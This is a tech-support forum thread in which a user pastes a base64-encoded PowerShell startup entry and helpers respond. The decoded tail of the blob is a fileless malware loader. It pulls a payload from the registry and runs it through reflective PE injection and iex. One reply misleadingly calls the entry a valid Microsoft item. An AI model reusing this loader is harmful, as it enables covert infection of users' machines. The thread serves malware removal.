mx6Sks1dEdXd3hWNVBkVlJHVmR6dExOdFd2aDhIYjhpcWt4L3VHWVJXNVJvZm51NHlKbE9Pd3ZYeXBPZ
zdONXg2N3FOQmxJb3h1QS81RmhydG1aSkp6cHh5U3diZ1crL0t6YWdJb1RaTGFTQXNMRUdrVkk2ckY3Y
zV2TCtuZzlSRlRPK2VydDBCdzJrSjVkZmhwckdLczRIL3pIdVFBZE1Wam5rS2xlSXo4NnYyTkJ5eXowd
TUzNGsyd293WDNML0F3Q1p4SGFoOFVZU2FLcmV5cXJ6Y0I5dkxNMForZmlxMjg2ZnUzQUd0dE9QMTRxe
m9aQ21vNm93VlJjQ2VpbFh1NkYxT0EvTlord240VDEwd0pRVURnVWpjVTI1SUNhQUVibGJ2azhPVHhHQ
1EydXJPWkVkN1RodlliQXJ6NWd4MkxHOFNRYUUvbVNTenY2WHhJbitwSkdxMjlPVHFMSEVGUFBIQ3hWb
DFZNkw2eDNXRTBtMWd0T3ExdU10YWVIOHBkdzVIdHk4WFdtcnkyakdRd0xmOFM3UzRRMTg2eU0vK2RVY
jZjb210aFo1R2lzajN2T1VScXNFVjVPSDl4dmJ5RFlFM0t2VzEycUc1OEs0M3p5dzNoNy9oeEErRlgzS
k9NZHhqNnlQOUE5emdEKzJhQ1ZmcTh6L3orTXNlZ21MOW1wcm51NWRwelJYY0t5WXZYT2FCUGtIenhsV
3AvUFNCcFdlbWtGbDJFSVBROVIxTitRWGdaNkE4WThwa3ZqNEdkRlRIS1lwRElMQ0RRWXl3ampxa21Za
3NIRHRidyt6YWFBT0xRZWcraUI5VHgzQlVtMUhZY0NhUncvSUxyU3Q0VTFpVTIrcXZmVWkvYXhLdG5LY
0tEdFdUK01PYUN5b1Baaml3SDl3TmdGb0VNbXoweEVwREhjY0F0VUtLdDZkZ2h6WmlMRjNIbFpGVk5WT
nNDYzJWeUp6NUlQcDdNUDdpa29ETld3SUpjWUcrYmNabVowcTBZVU1aK2pFTXl6L0FabmpqNE9GUnVsQ
XBhL3BuaFpxak96T0Zuc1UxcHlMc0VMZjlPN0tUaUg3L2xaR1JxVzlWUFk0RFo0NjkzazU3dExGbXVEV
FdJSXYxUDMzYmlSd1dEOGtnei9Od1JuZVoxaDBWRkhFR3V6UndZNEg5M3g3V2duTytTMW56MnpnVWdMY
VVwWFNKcE0zWnZtZUZlTjZRS3hhM2RISUM4V1AzY1BZWVdwRFNsMW1ZdFJid00yWlhsL094UmR6eGdhW
nlyL2pNSlRKbVdxam1BR1RPRjZvajlSWjl3L05reld6RTJTSlpFZ3BINjFyUFgxVzJuVDRIQVJGUks4Q
lBIdXdKd2cwQllwaFZ0OG9UZkdESlNKSkZ5dkJKV3pvVVFXMEFFNW5yNUs4cEFlT0NvQ0pvUGJLZ3hxY
nh0aFozb1dmVkhRN1NKRHI2SWVtM2FGaFVxUURHUm5pMmU0ODNCN2R6L0xVTmFHckh2Q3ZiTG9qYThzb
jc1aDZKMlA4VGtxMVBFV2dpS0x4bU1IOUJrd2xkNVJsR3ROUzFsOU92WUdHL1VseXdGNktQcUFIdFkvZ
3p2NlFYaXk4Z2Z0MkdwY3NFWUJreVZqeHlzUmpoOFhibGRuY3ZhZFM0dW1wdkpJQWpVYS9zOU1lVkRiN
U5HVWd5ZklxZE5zTmo2dDBiS0ZVaHJMVVRLeGRYbk9BT0xNdG9sYlVlelFXM0hWdWk4UGo0dWtGOVhvV
DdMQzZlaHkzVFhnMTBMS2NXOFVPZWhQRTFjWFN1bTVqdnJaekRueGFjVUNHOUlCQ0hpcDIxL3JWczRiN
2xhdnpNRW05d1A5RTh2ZHdOQVNHclMwd1ZyMStFQkFxZzh5RVJuR2FzZ0J1K3Rsdjd4am5aMGREMXJVW
kZLOW5aR2F0eXgyK1NjdzFsbEtsa3o4MXhjcjhwMXNQNUxvQUFNWlFFYXEvMmtwWEpWdS9QakNPc2ZKd
TEwNCszcnNnb3U3bWY3bldRY09PYWhMbkR6OE1veXEvcVAvanpGNDlXcnBIeWx6TndiUW1SbmJucXVkd
kRUVXFidERBaHhmd1ZjcDF3RTNUYTArMlREMjVRTEhvZms2bDcvYjhjWGc3OHM0N29iTUNOWlFqQUw3d
FlFdzI1V3hTNnRnTEE3QTc4K0xHc1kybzdQWDdHTnFPTlcrRWJ5cXlsUjQ4Y0REL2Y5OXBNTjZVckN2N
U9qZXViMEVmZVcrWDJRUGdlaUFQM0diTUh4Wm5zTEtOTGFyL2JyVEhxMEZKVVVJcHVobm14TnlhcTA5Y
mNtSXQ1TWFRY3owOUxRYUxhMU1qSFlGdm80RkF0b2J3cWtDd2lLV3JpdS9BRGt1ZFJiTHc0ZTJoYTA1N
nl0UzJnSWxtZFBOeGVrRTlVNXpML0lPYXAxWHBVR253MWpnRllUTVhkVW84NnE3cVlkdTAyMDFacGh2M
TNLUUE0a3BrOVJZYnNkSTNCYTRsQzVMakFqWkV3SG94a1h4eFY4TVo4YTloKzRveGsrK1RWNU1YN0ZUS
C9UT1EwMklmd3d4eWJIRVVFTDRiV0JCUWtveG9KbkFpSXordzY2YkFjSTIvOVpNZUExWDMzZ1N3Wm10R
Ud6QWdjTXY4RDc1WEFUeGd3Qmk2c3VBQ29vRldLRXBvdStrVFg0WThOc0U5SFB3UktBRjRhUmlIT05sQ
TBqdXp5S3RRQU1VVjN3M0F4SG5iUjg0OHYvc2tUN1pvNVViWS8vWXM4NWVoemt0YW52VUZWMzVpNjZZR
UtIbmxwQXFBNTVoRllnc2ZVSUlqTE1WUEcyZkJGN2kyNkp1dmdvbFdSMkhTUlBJYTNDV1d6NlpZNk1XS
0NTUjhrWFYxaGgwd1RDSzFObENvb3ByU2hDY2YvbzB1RG9CK1hiMUpCSDBrblBuREx1VUNKYnBBcWFkN
0xldzF0a0pScUMyY1kzQ0xuZGpBVlh5U1VhTUQvSWZqcVFvck9SelVkSFQwU2hvNVdHTko2YUUrUkMwW
GhjY0JFOEZFNlB6ZkZ4U0ZJMHNOemk2aWJ3TURxaGY4dWQ1Z214MWVYMC9QM1pzbzVGcWhJcXpTZkJsV
VFLbjMxcUZibjdxZWdYMldKZ3NZZEhOUWxXL204MzRETjcwQXNFYk1IcmM1TERsVmgrQkM1WXFYS3g2Z
VFNRWRsZFJwYmJFYW5KR2NiZFlWT2xyQjd3YTRtYnc1YlBOOU52NFFsc0JYUzRqRS9Pc2k0VVNKQ3dqd
FFkdXNsUnEyb3JOenNwY2xTQ1pMSXBIZXBwbnZaei9aN0xTU1VacjVyQkMyRkdSVjVudGxJdEU3SzZBV
WNXTzRzYlF4N2F5TENnRzdnemdWZXIyb2lvUkF2VTVmV2lGbGcvTHMyWGhIRjdSNG1sVmdiNDk0SENTQ
TQwSndONU1JV3NsUUMxRzFWYXB5RjFScjZqWGVHUEk3MFRwZTY2b0EvWWRhNW1jVXBFS1BQWWdQdUZkc
WJGYmxLdml1NGZWMGFhd2xzc3VXQmU4c1ZSVTN0Z2poai9PTjFubnVrR2plVUx3M0tJZlBTVWprUFQyQ
nZmbEo3SHhwd3ZyOFVGZFdSOStiNldBd3ZPV0pUWU1tWGRWbzE3RFVWZ3loSUd5TXRSYW9mcXZIU0dRL
zJoQUJONkcrekthUS9zMllkWWd2TUw3RU81Z2ltVkl0cWx1azF1R2hqSUZyZkxqN0JCRmNZUjg0akhjN
WVteHVFbmJFemgwNm15MzBWRG1TS0RsKzEyUzRFREhEbTVTOXRQZTRFYllPN0JSVWpzUEdWVU04dEp2N
1B6OEtEUEhHcEJ0aVdDMWZYN3lyWW1wekt1anBUREhTOEtSaFdCMEk4OGxYd29RVkRvazNKMlFqaDFxT
WV2ejdvRHZ4ZExFZlBhUFBJYkk4OGV1QkhsOEdhWEFldTBiV2NBTVhIQ3FJYXVxWGRTNG5PWkhrcUN2Q
1FTVVVjbWlCYmxQRnMvZDRUc3dxRllDRWNPVUJ4Q2pxVm15ZXcraXRJVW9QYnJjczg0TzJiSHNQYWRvN
jhiaEU3ZHZXNmtWY2FaM3FaelRIMU94bWRyaUY5T3ZyejZyVDVNdlluN2U1VmJCclZYaVhvczZPVlNnZ
HNZSGlkTGEvMWE2dU16YnpKYUFJYStVeG1iS1ZjWEVwbkZhTmc5b0hMV0RLc0tXUisxL0xvUXhiUDFiN
itPWUcrdDNRby9vMlRUVVJPdFpWWVRjaDVqcC9GZXBxemdyMXhha3J2elA0dmhzd1l1QVNGUnFyeEJNd
m9idUNnanQwZWFnQzNTSU1CMHFFR21hZGRKZnY3QnJTTWlTTEJrV1hSa0tLOU1xaXJTR29vclNHMTNLa
1pNek12S1pXUC9QTktHS1kzSzFrVzJ3OER2bC9tRS9FS2Y4SHdBcGcrODY3d1p2SmlYK2dSSnhwdnZPb
TYwdkdKNmxoZklMdFl1eXlPVFVZbVpUdlBqZ2NtZ1FGcXNIM0Y2dGtUcjVWQWxvOEs4ZDZ6RTdKc0NUd
DA1aTJuT1hqU3pnOVF3ZUh0WUQvR0FKa29pdm5ydi9wYUJibnpqdVo5RWFvd3VxQTVxQ09TZHdReEFFY
1R0ZzZhYUlrVHdiTzE1VEFsekpnQ0lFT1Y1Ym5xUTJqVjdKY0c2ZW9NTkNLVzlpVVlrQmZGSTAzRERsN
HM3QkNkY2wvUlJ2NFpnU3RWSDJQd0p4L1FvRzRCcFp2MGhFb3dSLzVHcDFQNSswMVhMTGgxSTZKRFFta
DNUWXUvaHdBeTR6T2d3TklNK0w3SklmcWUzTGxoY1M1MTAvLzBsUU05MVBCenlOb2hMU0M5dnF0QUd6a
nFoSXZBYThrbXF6SXFYckh2SWwwMFh3eGY2S04rQUtoZlJkdEMyT3ZTNEJha2Y4RmlPNGYxd2lBZ2dRW
XgxU29nMGlsS0dKVVd2NGh4SDJPc3NlTUd6VHNkRXhCcFlrc2pWVEpKYTNnWFJEcmtOcUUrOVVtMERhV
kxKV3FoWHRqRVpiZjZkbmhLTWhOa28wemdFbUg1YS9TNzRGZlJVNjVFUzhSUEUxbXpSQ1JDNjByU0pWb
HVCcnlWdW8rN2lNTm5KeE8rWGJabTZ5a2tjby9mb0IrMU00NFgvM2FCWDA1SUhMNWIwYzV1VzdFaU04V
0VGa25yNnlRZHpYTE80bWVZZVU5NlVnemcrRk5HODNPT2dYdG5LNmcxNmM3WDBPUHNDellGQ3BCTXdtb
XNrKzhvVlUrSHUzazg2K05EaHBadUhFeFBZeFpRVVpGdHQxWXJZK3BZNU8vamVzdFJvOEdjemkyaHRrQ
0dCTW1jdmdBY0Q5R1lkT0ZxZHFUdnpZbVRmS0M3a0VZU3plUStwQnR0SUJmZytodXRkeisxdnJJS29Ba
GxHaHR4bWNCQUlEeklOVzRxV3lmaEVYOTMrbmlNL1owcVpLUWtOQ2k2eWVHZ0grb2J0cTBkNkdqZXpKT
EdpaTVzdmRySmZ1M3BTZ05aSXMxVFYwdEdZU1E1WXNTSDJ2YTVqUEZvMVpsYlJjV2VhZXY5TkV0bis1U
W9TS212RVpzZG1wVnlIdEZBTk8xWDhrSjR3M2h3MDJEbnhsdE1NaHNLMGQvRVBoYWl2S1dnVW9tMlhJV
TVHdURMU0tJZEp3MktoMTEvOVNZUGs4Wko5blE1d2JFLytQZzdkc0xYV0sxUU1xSVdJMWxxeHFkeVpnT
TR3Y0tzU1B0VitMWk01ZTVOYkpaWlcxYW12TjdpQ2lLMXplUHdDMTMvZUs1N1ZEaEpoYmJPcWtLdm94c
G9qTGFUTTQ2RGF5eEhUS2docGd3UHl3N2lJYjVGVDlQRThCTzZ6b1UxM3pCMkw2OUVmTW1FM2tpemhYa
FU1UVNLcE9QbXIxTFBGNnI2c3Q4V1lvcXJxSHNjMGViUFFRby9qVXNCQ1JSV3VlODhINGx5SHlLaEswM
DdUL3dMQ3FiTWdadGc4YzF4cTEyaTdnRHlFRHl0N0svRUtNMk54QjVjS0ZBV2dNT3lqOC9BUTMzR1E3O
FFiMDRlWmpGckFhcEVoMWJlVnZQdFFBSkV0NmxocDFBcE1DeHk5SVJGWnE1L1dIUlpaS0lXR2MyYUdXd
FF6aUsxVWRaNkdFVUg0dllKNFZMcXJWbGJtdHJ5ZUxhUU1jeVhlOVFjQ2pQRWFRZ2hRY3lDV3ltZ3Rwc
XhQd3Vyc2V5MytoWVl2aW5hQTJkb0tpL2d5Q1RQTlZIYkU4S0gwV0hSdUVoUUcyZ0hleFMwOVJuRkw2Y
k9TdnJwVGVsRmsxY0lFYVoreU9IZG4vRjIyY1lUdk9laFRRYkpuR1luYWRNbnBuTlEwTFoxb2xpTEwyT
1VuNWFVWTlGa245eExTcERqQ2ZqZmlRSHptRHJoTEErUVVxTmZEc0tsbVYzUkg4aCtCTkNTKzFiaHV0S
URoZzJRU1gvUmRRQ1R6RVprNnRTZXY5UGxDQWxnT3o4ZkRwakhqWTN6YnlaMVA5amgrY3hsZ21uRjNFN
3ozL0dXcm5yNDZNRUlTYlpLVnIxMFd5ajVaM1hxSDcwZktreFgwb09KVEMzVFVpL3VoOG5Taml3SFdKN
kZhRHdHZ2ROQ0Z3bW9SRWV5MnRMd2xoUVlONlFFY3dvVExrdUtpWUltTGNzN3JjWlBEN0ZhcWoyTlBnK
3RUN1hhaVp5OXB2dWVDMHpScVdDRW5LalA1WGhpWkVuMUJhaTFQNHp5YlV4ZHh6akRLUXlMSDdTUUVTT
E5JY3V3S2R0VStONjZZSXYzclNzeThmd3pPMUU4eVJUT3FWOHQzTTl5ZGlCTnZrbGRvclRIQzdBb21PR
2V6N2JBeWUyWkVYcWhjZmRHKzV4bmN1eUZOa3dBL0JQMXZGM0k1M0IzN1U4OTdMZDlNeVFHQnB6N0VLU
GdZYnZoU2VKdzNhNjM5NG4yZTMxLzU1U2FXdlczOWJlL2RKdVpLcFNmUWVPcUVYa2NGZi9BL2hsWmpjS
09kSXVGM1ZhNkNvaXEvVnJ4K2h3d0hRcmlxS3FONitMaEVaYUNMcFdDODlLRGY3ZlplTHorOVc5YWQ5d
zEwSVRiV3BmSWJDaHE3cXQxMWxORWJaOTJTQ1lVLzJkek9hRU1JWVpJaTEvbUFta3c0azB1VUZ2MUM0U
2phT1JUcm42cS9od2N2RHJ3OVZKSW5IcE1Oc3Y1UDBNZkVBTlpudGw0dmx1KzVEZTBUSFNOSDZDUUhLZ
1duZmJsVHdSemRHcnRnYzhTbEp4N1RKTzR2RWpFTU0rT0dtNUdIRFBvM0wxOTRzUWNtVnVVSXVCYkg2N
jdEbVY5M0tYOE5UcHczQytNQUpXcGlLdmNzaDQ3akoxd0s1RE9HMk1aVnl4azRzbU1ZemI2Y2RpQ0JuV
1dIK0hsQ1YvUFZVMlhSdzluSXU5SHY0QzkvMEI1L0psenJja3dtRzFDRzJpTWhoem1ReGlkVTlJTGJOe
kx4S2pKQzg0L2lZRTBrVStPTFo3c1JGWDl2UkxDQlJXcTlEY2pjRDFKTTdOOXdwcXg4S2E0TFNmdldrK
293cU9weE05b3E4QzJjNittZHo2VDNXcEovRlI4RlRNN3AyWFczc0FQajJNVDlqbGtnU1pha3RsZlowR
mY3MFBSc3N0U3VVdnBNSmxHeCtBTlVTOFh5N3ZsWWdCRmZ6M0dkVUtUZ1MySGNhbUk0RGZpZ0ZlakhiW
XJhdmIrWVlKL2xzUWRLVGRFcVVzeU9kckpaWlZxL2RZWHRCaGJsWkxrRlFwWExVSG9MNmdYa3VKdjMyN
kdUbUR3RFYrRVhwSGJnMEI1TkhNSTh6aTUyOC8ydUdNV2pCQ3Z5bWNzMzRaZnRpUXBYUkRGMnBIS3Jaa
TdmMVZuRExaMkdMayt3a3FNK3FJQVJ0Zk1RaFlRRXpiZmlQNXhKT3g0b3psYWRWL2hpMVl1aytEY0tFT
DkxYlh4eUduZDM5d3h6ZjBjL3c5M0RTSWk3NkxGZCcpOw0KJGZhWW1nRmhSVW5uQVNSamdZID0gYlVYS
HFVbUprY0NCaCAtQUpMSVhGSUFITVlSRVBHWkRPS0cgJGZhWW1nRmhSVW5uQVNSamdZIC1hYkVZaHBoT
URoTSAkSGRGV1lTdm9yTEFVTHBTcA0KJGZhWW1nRmhSVW5uQVNSamdZID0gaW5mbGF0ZWJpbiAtQUpMS
VhGSUFITVlSRVBHWkRPS0cgJGZhWW1nRmhSVW5uQVNSamdZDQoNCiRSTFlIVlJGRENFU05QQlUgPSAnS
EtDVTpcU29mdHdhcmVcQ2xhc3Nlc1wnICsgJFFCQUZUU1VVT0hDWFRPQ007DQokTlNHUEluWG9EeVNjQ
3ZQVHEgPSAnJzsNCmlmIChbSW50UHRyXTo6U2l6ZSAtZXEgOCkgew0KCSROU0dQSW5Yb0R5U2NDdlBUc
SA9IChHZXQtSXRlbVByb3BlcnR5IC1QYXRoICRSTFlIVlJGRENFU05QQlUgLU5hbWUgJEdEWVdKV1BUT
U5QWFRFVldLTUopLiRHRFlXSldQVE1OUFhURVZXS01KOw0KfWVsc2V7DQoJJE5TR1BJblhvRHlTY0N2U
FRxID0gKEdldC1JdGVtUHJvcGVydHkgLVBhdGggJFJMWUhWUkZEQ0VTTlBCVSAtTmFtZSAkREdLVURPQ
UFHRkdIKS4kREdLVURPQUFHRkdIOw0KfQ0KJE5TR1BJblhvRHlTY0N2UFRxID0gYlVYSHFVbUprY0NCa
CAtQUpMSVhGSUFITVlSRVBHWkRPS0cgJE5TR1BJblhvRHlTY0N2UFRxIC1hYkVZaHBoTURoTSAkSGRGV
1lTdm9yTEFVTHBTcA0KIyROU0dQSW5Yb0R5U2NDdlBUcSA9IGluZmxhdGViaW4yIC1BSkxJWEZJQUhNW
VJFUEdaRE9LRyAkTlNHUEluWG9EeVNjQ3ZQVHENCg0KJGZhWW1nRmhSVW5uQVNSamdZID0gJGZhWW1nR
mhSVW5uQVNSamdZICsgJ0ludm9rZS1SZWZsZWN0aXZlUEVJbmplY3Rpb24gLVBFQnl0ZXMgJE5TR1BJb
lhvRHlTY0N2UFRxOycNCmlleCAkZmFZbWdGaFJVbm5BU1JqZ1k7
 

Someone...


Edited by jhefreyzz, 21 December 2015 - 08:47 PM.


BC AdBot (Login to Remove)

 


#2 Condobloke

Condobloke

  Outback Aussie @ 54.2101 N, 0.2906 W


 • Members
 • 6,085 posts
 • OFFLINE
 •  
 • Gender:Male
 • Local time:08:57 PM

Posted 21 December 2015 - 09:51 PM

Has it occurred to you that this is a valid Microsoft entry  ?.....Microsoft Operating System  Microsoft Corporation C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe


Condobloke ...Outback Australian  fed up with Windows antics...??....LINUX IS THE ANSWER....I USE LINUX MINT 18.3  EXCLUSIVELY.

“A man travels the world in search of what he needs and returns home to find it."

It has been said that time heals all wounds. I don't agree. The wounds remain. Time - the mind, protecting its sanity - covers them with some scar tissue and the pain lessens, but it is never gone. Rose Kennedy

 GcnI1aH.jpg

 

 


#3 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:02:57 AM

Posted 21 December 2015 - 10:53 PM

yes

 

it directs to the powershell program when i open it. But I can't see the interface or the program its like in the minimized state#4 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:02:57 AM

Posted 22 December 2015 - 06:21 AM

Need some help folks.
maybe someone can...#5 Condobloke

Condobloke

  Outback Aussie @ 54.2101 N, 0.2906 W


 • Members
 • 6,085 posts
 • OFFLINE
 •  
 • Gender:Male
 • Local time:08:57 PM

Posted 22 December 2015 - 08:28 PM

Approach this with Caution.

 

I would strongly advise you set a System Restore Point, before you start......

 

and also ensure you have a current Back Up

 

from THIS PAGE 

 

 

I found the link below...

 

https://gist.github.com/jakeballard/11240204


Edited by Condobloke, 22 December 2015 - 08:30 PM.

Condobloke ...Outback Australian  fed up with Windows antics...??....LINUX IS THE ANSWER....I USE LINUX MINT 18.3  EXCLUSIVELY.

“A man travels the world in search of what he needs and returns home to find it."

It has been said that time heals all wounds. I don't agree. The wounds remain. Time - the mind, protecting its sanity - covers them with some scar tissue and the pain lessens, but it is never gone. Rose Kennedy

 GcnI1aH.jpg

 

 


#6 jhefreyzz

jhefreyzz
 • Topic Starter

 • Members
 • 8 posts
 • OFFLINE
 •  
 • Local time:02:57 AM

Posted 24 December 2015 - 08:14 PM

hello sorry for the late response.

 

I don't mean to change the windows state of the powershell but I want rather to get rid off the startup item which is using the powershell to execute commands#7 Sintharius

Sintharius

  Bleepin' Sniper


 • Members
 • 5,639 posts
 • OFFLINE
 •  
 • Gender:Female
 • Location:The Netherlands
 • Local time:11:57 AM

Posted 24 December 2015 - 08:27 PM

Hi there,

Msconfig only temporary disables items, it won't remove the actual run entry itself.

Please run this to get a list of startup items on your computer.

Autoruns by Sysinternals

Please follow the instructions below to give me an Autoruns log containing your start-up entries:
 • Download Autoruns from here.
 • Extract the content of the Autoruns.zip folder on the Desktop.
 • Open the Autoruns folder, right click on Autoruns.exe and click Run as Administrator.
 • Accept the EULA on opening, then wait for all the entries to load.
 • Click on File, then Save and save the file to your Desktop.
 • Go on ge.tt and upload the Autoruns file you saved.
 • Please copy and post the download URL of your uploaded file in your next reply.
Regards,
Alex
0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users